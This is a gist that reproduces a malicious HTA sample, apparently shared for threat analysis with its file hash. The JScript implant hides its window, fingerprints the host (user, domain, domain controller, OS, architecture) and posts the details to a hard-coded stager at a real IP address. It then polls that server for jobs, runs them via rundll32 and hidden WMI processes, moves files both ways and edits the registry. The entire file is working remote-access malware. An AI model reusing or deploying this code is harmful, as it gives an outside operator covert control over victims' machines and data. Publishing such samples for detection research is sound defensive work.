|
|
@@ -0,0 +1,847 @@ |
|
|
## uploaded by @JohnLaTwC |
|
|
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde |
|
|
<html> |
|
|
<head> |
|
|
<script language="JScript"> |
|
|
window.resizeTo(1, 1); |
|
|
window.moveTo(-2000, -2000); |
|
|
window.blur(); |
|
|
|
|
|
try |
|
|
{ |
|
|
window.onfocus = function() { window.blur(); } |
|
|
window.onerror = function(sMsg, sUrl, sLine) { return false; } |
|
|
} |
|
|
catch (e){} |
|
|
|
|
|
var JPTUDBSTOW = |
|
|
{ |
|
|
FS : new ActiveXObject("Scripting.FileSystemObject"), |
|
|
WS : new ActiveXObject("WScript.Shell"), |
|
|
|
|
|
STAGER : "http://104.238.179.183:9999/hoVgt", |
|
|
SESSIONKEY : "bd19aa8e9b4a40ab9db982f82775fc8c", |
|
|
JOBKEY : "", |
|
|
JOBKEYPATH : "http://104.238.179.183:9999/hoVgt?sid=bd19aa8e9b4a40ab9db982f82775fc8c;csrf=" |
|
|
}; |
|
|
|
|
|
/** |
|
|
* Sleeps the current thread |
|
|
* |
|
|
* @param int ms - how long to sleep in milliseconds |
|
|
* @param function callback - where to continue execution after the sleep |
|
|
* |
|
|
* @return void |
|
|
*/ |
|
|
JPTUDBSTOW.sleep = function(ms, callback) |
|
|
{ |
|
|
if (JPTUDBSTOW.isHTA()) |
|
|
{ |
|
|
window.setTimeout(callback, ms); |
|
|
} |
|
|
else |
|
|
{ |
|
|
var now = new Date().getTime(); |
|
|
while (new Date().getTime() < now + ms); |
|
|
callback(); |
|
|
} |
|
|
} |
|
|
|
|
|
/** |
|
|
* Attempts to kill the current process using a myriad of methods |
|
|
* |
|
|
* @return void |
|
|
*/ |
|
|
JPTUDBSTOW.exit = function() |
|
|
{ |
|
|
if (JPTUDBSTOW.isHTA()) |
|
|
{ |
|
|
// crappy hack? |
|
|
try { |
|
|
window.close(); |
|
|
} catch(e){} |
|
|
|
|
|
try { |
|
|
window.self.close(); |
|
|
} catch (e){} |
|
|
|
|
|
try { |
|
|
window.top.close(); |
|
|
} catch (e){} |
|
|
|
|
|
|
|
|
try{ |
|
|
self.close(); |
|
|
} catch (e){} |
|
|
|
|
|
try |
|
|
{ |
|
|
window.open('', '_self', ''); |
|
|
window.close(); |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
} |
|
|
} |
|
|
|
|
|
try |
|
|
{ |
|
|
WScript.quit(); |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
} |
|
|
|
|
|
try |
|
|
{ |
|
|
var pid = JPTUDBSTOW.process.currentPID(); |
|
|
JPTUDBSTOW.process.kill(pid); |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
} |
|
|
} |
|
|
|
|
|
/** |
|
|
* Determine if running in HTML Application context |
|
|
* |
|
|
* @return bool - true if HTML application context |
|
|
*/ |
|
|
JPTUDBSTOW.isHTA = function() |
|
|
{ |
|
|
return typeof(window) !== "undefined"; |
|
|
} |
|
|
|
|
|
/** |
|
|
* Determine if running in WScript Application context |
|
|
* |
|
|
* @return bool - true if WScript context |
|
|
*/ |
|
|
JPTUDBSTOW.isWScript = function() |
|
|
{ |
|
|
return typeof(WScript) !== "undefined"; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.user = {}; |
|
|
|
|
|
JPTUDBSTOW.user.isElevated = function() |
|
|
{ |
|
|
try |
|
|
{ |
|
|
JPTUDBSTOW.WS.RegRead("HKEY_USERS\\s-1-5-19\\"); |
|
|
return true; |
|
|
} |
|
|
catch(e) |
|
|
{ |
|
|
return false; |
|
|
} |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.user.OS = function() |
|
|
{ |
|
|
try |
|
|
{ |
|
|
var wmi = GetObject("winmgmts:\\\\.\\root\\CIMV2"); |
|
|
var colItems = wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem"); |
|
|
|
|
|
var enumItems = new Enumerator(colItems); |
|
|
var objItem = enumItems.item(); |
|
|
return objItem.Caption; |
|
|
} |
|
|
catch(e){} |
|
|
|
|
|
return "Unknown"; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.user.DC = function() |
|
|
{ |
|
|
try |
|
|
{ |
|
|
var DC = JPTUDBSTOW.WS.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName"); |
|
|
if (DC.length > 0) |
|
|
return DC; |
|
|
} |
|
|
catch(e) |
|
|
{ |
|
|
} |
|
|
return "Unknown"; |
|
|
|
|
|
} |
|
|
|
|
|
JPTUDBSTOW.user.Arch = function() |
|
|
{ |
|
|
try |
|
|
{ |
|
|
var wmi = GetObject("winmgmts:\\\\.\\root\\CIMV2"); |
|
|
var colItems = wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem"); |
|
|
|
|
|
var enumItems = new Enumerator(colItems); |
|
|
var objItem = enumItems.item(); |
|
|
return objItem.OSArchitecture; |
|
|
} |
|
|
catch(e){} |
|
|
|
|
|
return "Unknown"; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.user.CWD = function() |
|
|
{ |
|
|
try |
|
|
{ |
|
|
cwd = JPTUDBSTOW.shell.exec("cd", "%TEMP%\\cwd.txt"); |
|
|
return cwd; |
|
|
} |
|
|
catch(e) |
|
|
{} |
|
|
|
|
|
return ""; |
|
|
} |
|
|
|
|
|
|
|
|
JPTUDBSTOW.user.info = function() |
|
|
{ |
|
|
var net = new ActiveXObject("WScript.Network"); |
|
|
var info = net.UserDomain + "\\" + net.Username; |
|
|
|
|
|
if (JPTUDBSTOW.user.isElevated()) |
|
|
info += "*"; |
|
|
|
|
|
info += "~~~" + net.ComputerName; |
|
|
info += "~~~" + JPTUDBSTOW.user.OS(); |
|
|
info += "~~~" + JPTUDBSTOW.user.DC(); |
|
|
info += "~~~" + JPTUDBSTOW.user.Arch(); |
|
|
info += "~~~" + JPTUDBSTOW.user.CWD(); |
|
|
|
|
|
return info; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.work = {}; |
|
|
|
|
|
/* |
|
|
JPTUDBSTOW.work.applyDefaultHeaders = function(headers) |
|
|
{ |
|
|
var headers = (typeof(headers) !== "undefined") ? headers : {}; |
|
|
headers["SESSIONKEY"] = JPTUDBSTOW.SESSIONKEY; |
|
|
headers["JOBKEY"] = JPTUDBSTOW.JOBKEY; |
|
|
} |
|
|
*/ |
|
|
|
|
|
/** |
|
|
* Reports a successful message to the stager |
|
|
* |
|
|
* @param string data - The post body |
|
|
* @param map headers - Any additional HTTP headers |
|
|
* |
|
|
* @return object - the HTTP object |
|
|
*/ |
|
|
JPTUDBSTOW.work.report = function(data, headers) |
|
|
{ |
|
|
//var headers = JPTUDBSTOW.work.applyDefaultHeaders(headers); |
|
|
return JPTUDBSTOW.http.post(JPTUDBSTOW.work.make_url(), data, headers); |
|
|
} |
|
|
|
|
|
/** |
|
|
* Reports an error condition to the stager |
|
|
* |
|
|
* @param exception e - what exception was thrown |
|
|
* |
|
|
* @return object - the HTTP object |
|
|
*/ |
|
|
JPTUDBSTOW.work.error = function(e) |
|
|
{ |
|
|
try |
|
|
{ |
|
|
var headers = {}; |
|
|
headers["errno"] = (e.number) ? e.number : "-1"; |
|
|
headers["errname"] = (e.name) ? e.name : "Unknown"; |
|
|
headers["errdesc"] = (e.description) ? e.description : "Unknown"; |
|
|
return JPTUDBSTOW.work.report(e.message, headers); |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
// Abandon all hope ye who enter here |
|
|
// For this is where all things are left behind |
|
|
} |
|
|
} |
|
|
|
|
|
/** |
|
|
* Makes the stager callhome URL for a specific jobkey |
|
|
* |
|
|
* @param string jobkey - which job to fetch |
|
|
* |
|
|
* @return string - the stager callhome URL |
|
|
*/ |
|
|
JPTUDBSTOW.work.make_url = function(jobkey) |
|
|
{ |
|
|
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : JPTUDBSTOW.JOBKEY; |
|
|
return JPTUDBSTOW.JOBKEYPATH + jobkey + ";"; |
|
|
} |
|
|
|
|
|
/** |
|
|
* Fetches the next job from the server |
|
|
* |
|
|
* @return object - the HTTP object |
|
|
*/ |
|
|
JPTUDBSTOW.work.get = function() |
|
|
{ |
|
|
var url = JPTUDBSTOW.work.make_url(); |
|
|
return JPTUDBSTOW.http.post(url); |
|
|
} |
|
|
|
|
|
/** |
|
|
* Forks a new process and runs the specific jobkey |
|
|
* |
|
|
* @param string jobkey - the job to fetch/run |
|
|
* @param bool fork32Bit - ensure new process is x86 |
|
|
* |
|
|
* @return void |
|
|
*/ |
|
|
JPTUDBSTOW.work.fork = function(jobkey, fork32Bit) |
|
|
{ |
|
|
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false; |
|
|
|
|
|
var cmd = "rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication"; |
|
|
|
|
|
if (fork32Bit) |
|
|
cmd = JPTUDBSTOW.file.get32BitFolder() + cmd; |
|
|
|
|
|
cmd = cmd.replace("***K***", JPTUDBSTOW.work.make_url(jobkey)); |
|
|
JPTUDBSTOW.WMI.createProcess(cmd); |
|
|
//JPTUDBSTOW.WS.Run(cmd, 0, false); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http = {}; |
|
|
|
|
|
JPTUDBSTOW.http.create = function() |
|
|
{ |
|
|
var http = null; |
|
|
|
|
|
try |
|
|
{ |
|
|
http = new ActiveXObject("Microsoft.XMLHTTP"); |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
http = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); |
|
|
http.setTimeouts(30000, 30000, 30000, 0) |
|
|
} |
|
|
|
|
|
return http; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http.addHeaders = function(http, headers) |
|
|
{ |
|
|
var headers = (typeof(headers) !== "undefined") ? headers : {}; |
|
|
|
|
|
var content = false; |
|
|
for (var key in headers) |
|
|
{ |
|
|
var value = headers[key]; |
|
|
|
|
|
http.setRequestHeader(key, value); |
|
|
if (key.toUpperCase() == "CONTENT-TYPE") |
|
|
content = true; |
|
|
} |
|
|
|
|
|
if (!content) |
|
|
http.setRequestHeader("Content-Type", "application/octet-stream"); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http.post = function(url, data, headers) |
|
|
{ |
|
|
var data = (typeof(data) !== "undefined") ? data : ""; |
|
|
|
|
|
var http = JPTUDBSTOW.http.create(); |
|
|
|
|
|
http.open("POST", url, false); |
|
|
JPTUDBSTOW.http.addHeaders(http, headers); |
|
|
http.send(data); |
|
|
|
|
|
return http; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http.get = function(url, headers) |
|
|
{ |
|
|
var http = JPTUDBSTOW.http.create(); |
|
|
http.open("GET", url, false); |
|
|
JPTUDBSTOW.http.addHeaders(http, headers); |
|
|
http.send(); |
|
|
|
|
|
return http; |
|
|
} |
|
|
|
|
|
/** |
|
|
* Upload a file, off zombie, to stager |
|
|
* |
|
|
* @param filepath - the full path to the file to send |
|
|
* @param header_uuid - a unique identifier for this file |
|
|
* @param header_key - optional HTTP header tag to send uuid over |
|
|
* |
|
|
* @return object - the HTTP object |
|
|
* |
|
|
**/ |
|
|
JPTUDBSTOW.http.upload = function(filepath, header_uuid, header_key) |
|
|
{ |
|
|
var key = (typeof(header_key) !== "undefined") ? header_key : "ETag"; |
|
|
|
|
|
var data = JPTUDBSTOW.file.readBinary(filepath); |
|
|
|
|
|
// we must replace null bytes or MS will cut off the body |
|
|
data = data.replace(/\\/g, "\\\\"); |
|
|
data = data.replace(/\0/g, "\\0"); |
|
|
|
|
|
var headers = {}; |
|
|
headers[key] = header_uuid; |
|
|
|
|
|
return JPTUDBSTOW.work.report(data, headers); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http.download = function(filepath, header_uuid, header_key) |
|
|
{ |
|
|
var key = (typeof(header_key) !== "undefined") ? header_key : "ETag"; |
|
|
|
|
|
var headers = {}; |
|
|
headers[key] = header_uuid; |
|
|
|
|
|
return JPTUDBSTOW.http.downloadEx("POST", JPTUDBSTOW.work.make_url(), headers, filepath); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http.downloadEx = function(verb, url, headers, path) |
|
|
{ |
|
|
if (verb == "GET") |
|
|
{ |
|
|
var http = JPTUDBSTOW.http.get(url, headers); |
|
|
} |
|
|
else |
|
|
{ |
|
|
var http = JPTUDBSTOW.http.post(url, "", headers); |
|
|
} |
|
|
|
|
|
var stream = new ActiveXObject("Adodb.Stream"); |
|
|
stream.Type = 1; |
|
|
stream.Open(); |
|
|
stream.Write(http.responseBody); |
|
|
|
|
|
|
|
|
var data = JPTUDBSTOW.http.bin2str(stream); |
|
|
JPTUDBSTOW.file.write(path, data); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.http.bin2str = function(stream) |
|
|
{ |
|
|
stream.Flush(); |
|
|
stream.Position = 0; |
|
|
|
|
|
var bin = stream.Read(); |
|
|
var rs = new ActiveXObject("Adodb.RecordSet"); |
|
|
rs.Fields.Append("temp", 201, stream.Size); |
|
|
|
|
|
rs.Open(); |
|
|
rs.AddNew(); |
|
|
rs("temp").AppendChunk(bin); |
|
|
rs.Update(); |
|
|
var data = rs.GetString(); |
|
|
rs.Close(); |
|
|
return data.substring(0, data.length - 1); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.process = {}; |
|
|
|
|
|
JPTUDBSTOW.process.currentPID = function() |
|
|
{ |
|
|
var cmd = JPTUDBSTOW.file.getPath("%comspec% /K hostname"); |
|
|
//JPTUDBSTOW.WS.Run(cmd, 0, false); |
|
|
var childPid = JPTUDBSTOW.WMI.createProcess(cmd); |
|
|
|
|
|
var pid = -1; |
|
|
// there could be a race condition, but CommandLine returns null on win2k |
|
|
// and is often null on later windows with more harsh privileges |
|
|
|
|
|
// todo: this method is stupid. instead of using .Run, spawn a WMI process. |
|
|
// then we get child PID for free and can backtrack PPID, no race condition |
|
|
var latestTime = 0; |
|
|
var latestProc = null; |
|
|
|
|
|
var processes = JPTUDBSTOW.process.list(); |
|
|
|
|
|
var items = new Enumerator(processes); |
|
|
while (!items.atEnd()) |
|
|
{ |
|
|
var proc = items.item(); |
|
|
|
|
|
try |
|
|
{ |
|
|
/* |
|
|
if (proc.Name.indexOf("cmd") != -1) |
|
|
{ |
|
|
if (latestTime == 0 && proc.CreationDate) |
|
|
latestTime = proc.CreationDate; |
|
|
|
|
|
if (proc.CreationDate > latestTime) |
|
|
{ |
|
|
latestTime = proc.CreationDate; |
|
|
latestProc = proc; |
|
|
} |
|
|
} |
|
|
*/ |
|
|
if (proc.ProcessId == childPid) |
|
|
{ |
|
|
latestProc = proc; |
|
|
break; |
|
|
} |
|
|
} catch (e) |
|
|
{ |
|
|
} |
|
|
items.moveNext(); |
|
|
} |
|
|
|
|
|
pid = latestProc.ParentProcessId; |
|
|
latestProc.Terminate(); |
|
|
|
|
|
return pid; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.process.kill = function(pid) |
|
|
{ |
|
|
var processes = JPTUDBSTOW.process.list(); |
|
|
|
|
|
var items = new Enumerator(processes); |
|
|
while (!items.atEnd()) |
|
|
{ |
|
|
var proc = items.item(); |
|
|
|
|
|
try |
|
|
{ |
|
|
if (proc.ProcessId == pid) |
|
|
{ |
|
|
proc.Terminate(); |
|
|
return true; |
|
|
} |
|
|
} catch (e) |
|
|
{ |
|
|
} |
|
|
items.moveNext(); |
|
|
} |
|
|
|
|
|
return false; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.process.list = function() |
|
|
{ |
|
|
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); |
|
|
var query = "Select * From Win32_Process"; |
|
|
|
|
|
return wmi.ExecQuery(query); |
|
|
} |
|
|
|
|
|
// http://apidock.com/ruby/Win32/Registry/Constants |
|
|
JPTUDBSTOW.registry = {}; |
|
|
JPTUDBSTOW.registry.HKCR = 0x80000000; |
|
|
JPTUDBSTOW.registry.HKCU = 0x80000001; |
|
|
JPTUDBSTOW.registry.HKLM = 0x80000002; |
|
|
|
|
|
JPTUDBSTOW.registry.STRING = 0; |
|
|
JPTUDBSTOW.registry.BINARY = 1; |
|
|
JPTUDBSTOW.registry.DWORD = 2; |
|
|
JPTUDBSTOW.registry.QWORD = 3; |
|
|
|
|
|
JPTUDBSTOW.registry.provider = function(computer) |
|
|
{ |
|
|
var computer = (typeof(computer) !== "undefined") ? computer : "."; |
|
|
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv"); |
|
|
return reg; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.registry.write = function(hKey, path, key, value, valType, computer) |
|
|
{ |
|
|
var reg = JPTUDBSTOW.registry.provider(computer); |
|
|
|
|
|
reg.CreateKey(hKey, path); |
|
|
|
|
|
if (valType == JPTUDBSTOW.registry.STRING) |
|
|
reg.SetStringValue(hKey, path, key, value); |
|
|
else if (valType == JPTUDBSTOW.registry.DWORD) |
|
|
reg.SetDWORDValue(hKey, path, key, value); |
|
|
else if (valType == JPTUDBSTOW.registry.QWORD) |
|
|
reg.SetQWORDValue(hKey, path, key, value); |
|
|
else if (valType == JPTUDBSTOW.registry.BINARY) |
|
|
reg.SetBinaryValue(hKey, path, key, value); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.registry.read = function(hKey, path, key, valType, computer) |
|
|
{ |
|
|
var reg = JPTUDBSTOW.registry.provider(computer); |
|
|
|
|
|
var methodName = ""; |
|
|
if (valType == JPTUDBSTOW.registry.STRING) |
|
|
methodName = "GetStringValue"; |
|
|
else if (valType == JPTUDBSTOW.registry.DWORD) |
|
|
methodName = "GetDWORDValue"; |
|
|
else if (valType == JPTUDBSTOW.registry.QWORD) |
|
|
methodName = "GetQWORDValue"; |
|
|
else if (valType == JPTUDBSTOW.registry.BINARY) |
|
|
methodName = "GetBinaryValue"; |
|
|
|
|
|
if (methodName == "") |
|
|
return; |
|
|
|
|
|
var method = reg.Methods_.Item(methodName); |
|
|
var inparams = method.InParameters.SpawnInstance_(); |
|
|
|
|
|
inparams.hDefKey = hKey; |
|
|
inparams.sSubKeyName = path; |
|
|
inparams.sValueName = key; |
|
|
|
|
|
var outparams = reg.ExecMethod_(method.Name, inparams); |
|
|
|
|
|
return outparams; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.registry.destroy = function(hKey, path, key, computer) |
|
|
{ |
|
|
var reg = JPTUDBSTOW.registry.provider(computer); |
|
|
var loc = (key == "") ? path : path + "\\" + key; |
|
|
return reg.DeleteKey(hKey, loc); |
|
|
} |
|
|
|
|
|
/* |
|
|
// DEPRECATED |
|
|
JPTUDBSTOW.registry.create = function(hiveKey, path, key, computer) |
|
|
{ |
|
|
var computer = (typeof(computer) !== "undefined") ? computer : "."; |
|
|
var sw = new ActiveXObject("WbemScripting.SWbemLocator"); |
|
|
var root = sw.ConnectServer(computer, "root\\default"); |
|
|
var reg = root.get("StdRegProv"); |
|
|
|
|
|
var enumKey = reg.Methods_.Item("EnumKey"); |
|
|
|
|
|
var inParams = enumKey.InParameters.SpawnInstance_(); |
|
|
inParams.hDefKey = hiveKey; |
|
|
inParams.sSubKeyName = path; |
|
|
|
|
|
var outParam = reg.ExecMethod_(enumKey.Name, inParams); |
|
|
|
|
|
if (outParam.ReturnValue != 0) |
|
|
return false; |
|
|
|
|
|
if (outParam.sNames) |
|
|
{ |
|
|
var subKeys = outParam.sNames.toArray(); |
|
|
|
|
|
for (var i = 0; i < subKeys.length; ++i) |
|
|
{ |
|
|
if (subkeys[i].toUpperCase() == key.toUpperCase()) |
|
|
return true; |
|
|
} |
|
|
} |
|
|
|
|
|
var createKey = reg.Methods_.Item("CreateKey"); |
|
|
var createArgs = createKey.InParameters.SpawnInstance_(); |
|
|
createArgs.hDefKey = hiveKey; |
|
|
createArgs.sSubKeyName = path + "\\" + key; |
|
|
|
|
|
var createRet = reg.ExecMethod_(createKey.Name, createArgs); |
|
|
return createRet.returnValue == 0; |
|
|
} |
|
|
*/ |
|
|
|
|
|
JPTUDBSTOW.WMI = {}; |
|
|
|
|
|
JPTUDBSTOW.WMI.createProcess = function(cmd) |
|
|
{ |
|
|
var SW_HIDE = 0; |
|
|
var pid = 0; |
|
|
|
|
|
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") |
|
|
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); |
|
|
si.ShowWindow = SW_HIDE; |
|
|
si.CreateFlags = 16777216; |
|
|
si.X = si.Y = si.XSize = si.ySize = 1; |
|
|
|
|
|
//wmi.Get("Win32_Process").Create(cmd, null, si, pid); |
|
|
var w32proc = wmi.Get("Win32_Process"); |
|
|
|
|
|
var method = w32proc.Methods_.Item("Create"); |
|
|
var inParams = method.InParameters.SpawnInstance_(); |
|
|
inParams.CommandLine = cmd; |
|
|
inParams.CurrentDirectory = null; |
|
|
inParams.ProcessStartupInformation = si; |
|
|
|
|
|
var outParams = w32proc.ExecMethod_("Create", inParams); |
|
|
return outParams.ProcessId; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.shell = {}; |
|
|
|
|
|
JPTUDBSTOW.shell.exec = function(cmd, stdOutPath) |
|
|
{ |
|
|
var c = "%comspec% /q /c " + cmd + " 1> " + JPTUDBSTOW.file.getPath(stdOutPath); |
|
|
c += " 2>&1"; |
|
|
JPTUDBSTOW.WS.Run(c, 0, true); |
|
|
var data = JPTUDBSTOW.file.readText(stdOutPath); |
|
|
JPTUDBSTOW.file.deleteFile(stdOutPath); |
|
|
|
|
|
return data; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.shell.run = function(cmd, fork) |
|
|
{ |
|
|
var fork = (typeof(fork) !== "undefined") ? fork : true; |
|
|
var c = "%comspec% /q /c " + cmd; |
|
|
JPTUDBSTOW.WS.Run(cmd, 0, !fork); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.file = {}; |
|
|
|
|
|
JPTUDBSTOW.file.getPath = function(path) |
|
|
{ |
|
|
return JPTUDBSTOW.WS.ExpandEnvironmentStrings(path); |
|
|
} |
|
|
|
|
|
/** |
|
|
* @return string - the system folder with x86 binaries |
|
|
*/ |
|
|
JPTUDBSTOW.file.get32BitFolder = function() |
|
|
{ |
|
|
var base = JPTUDBSTOW.file.getPath("%WINDIR%"); |
|
|
var syswow64 = base + "\\SysWOW64\\"; |
|
|
|
|
|
if (JPTUDBSTOW.FS.FolderExists(syswow64)) |
|
|
return syswow64; |
|
|
|
|
|
return base + "\\System32\\"; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.file.readText = function(path) |
|
|
{ |
|
|
|
|
|
var loopcount = 0; |
|
|
while(true) |
|
|
{ |
|
|
if (JPTUDBSTOW.FS.FileExists(JPTUDBSTOW.file.getPath(path)) && JPTUDBSTOW.FS.GetFile(JPTUDBSTOW.file.getPath(path)).Size > 0) |
|
|
{ |
|
|
var fd = JPTUDBSTOW.FS.OpenTextFile(JPTUDBSTOW.file.getPath(path), 1, false, 0); |
|
|
var data = fd.ReadAll(); |
|
|
fd.Close(); |
|
|
return data; |
|
|
} |
|
|
else |
|
|
{ |
|
|
loopcount += 1; |
|
|
if (loopcount > 180) |
|
|
{ |
|
|
return ""; |
|
|
} |
|
|
JPTUDBSTOW.shell.run("ping 127.0.0.1 -n 2", false); |
|
|
} |
|
|
} |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.file.readBinary = function(path) |
|
|
{ |
|
|
var fp = JPTUDBSTOW.FS.GetFile(JPTUDBSTOW.file.getPath(path)); |
|
|
var fd = fp.OpenAsTextStream(); |
|
|
var data = fd.read(fp.Size); |
|
|
fd.close(); |
|
|
return data; |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.file.write = function(path, data) |
|
|
{ |
|
|
var fd = JPTUDBSTOW.FS.CreateTextFile(JPTUDBSTOW.file.getPath(path), true); |
|
|
fd.write(data); |
|
|
fd.close(); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.file.deleteFile = function(path) |
|
|
{ |
|
|
JPTUDBSTOW.FS.DeleteFile(JPTUDBSTOW.file.getPath(path), true); |
|
|
};try |
|
|
{ |
|
|
if (JPTUDBSTOW.JOBKEY != "stage") |
|
|
{ |
|
|
if (JPTUDBSTOW.isHTA()) |
|
|
{ |
|
|
//HKCU\SOFTWARE\Microsoft\Internet Explorer\Style\MaxScriptStatements = 0xFFFFFFFF |
|
|
var path = "SOFTWARE\\Microsoft\\Internet Explorer\\Styles"; |
|
|
var key = "MaxScriptStatements"; |
|
|
JPTUDBSTOW.registry.write(JPTUDBSTOW.registry.HKCU, path, key, 0xFFFFFFFF, JPTUDBSTOW.registry.DWORD); |
|
|
} |
|
|
|
|
|
JPTUDBSTOW.work.report(JPTUDBSTOW.user.info()); |
|
|
|
|
|
JPTUDBSTOW.work.fork(""); |
|
|
JPTUDBSTOW.exit(); |
|
|
} |
|
|
else |
|
|
{ |
|
|
if (JPTUDBSTOW.isHTA()) |
|
|
DoWorkTimeout(); |
|
|
else |
|
|
DoWorkLoop(); |
|
|
} |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
// todo: critical error reporting |
|
|
} |
|
|
|
|
|
function DoWork() |
|
|
{ |
|
|
try |
|
|
{ |
|
|
var work = JPTUDBSTOW.work.get(); |
|
|
|
|
|
// 201 = x64 or x86 |
|
|
// 202 = force x86 |
|
|
if (work.status == 201 || work.status == 202) |
|
|
{ |
|
|
if (work.responseText.length > 0) { |
|
|
var jobkey = work.responseText; |
|
|
JPTUDBSTOW.work.fork(jobkey, work.status == 202); |
|
|
} |
|
|
} |
|
|
else // if (work.status == 500) // kill code |
|
|
{ |
|
|
return false; |
|
|
} |
|
|
} |
|
|
catch (e) |
|
|
{ |
|
|
return false; |
|
|
} |
|
|
|
|
|
return true; |
|
|
} |
|
|
|
|
|
function DoWorkLoop() |
|
|
{ |
|
|
while (DoWork()) |
|
|
; |
|
|
|
|
|
JPTUDBSTOW.exit(); |
|
|
} |
|
|
|
|
|
function DoWorkTimeout() |
|
|
{ |
|
|
for (var i = 0; i < 10; ++i) |
|
|
{ |
|
|
if (!DoWork()) |
|
|
{ |
|
|
JPTUDBSTOW.exit(); |
|
|
return; |
|
|
} |
|
|
} |
|
|
//window.setTimeout(DoWorkTimeoutCallback, 0); |
|
|
|
|
|
JPTUDBSTOW.work.fork(""); |
|
|
JPTUDBSTOW.exit(); |
|
|
} |
|
|
</script> |
|
|
<hta:application caption="no" showInTaskBar="no" windowState="minimize" |
|
|
navigable="no" scroll="no" /> |
|
|
<!-- --> |
|
|
</head> |
|
|
<body> |
|
|
</body> |
|
|
</html> |
JohnLaTwC created this gist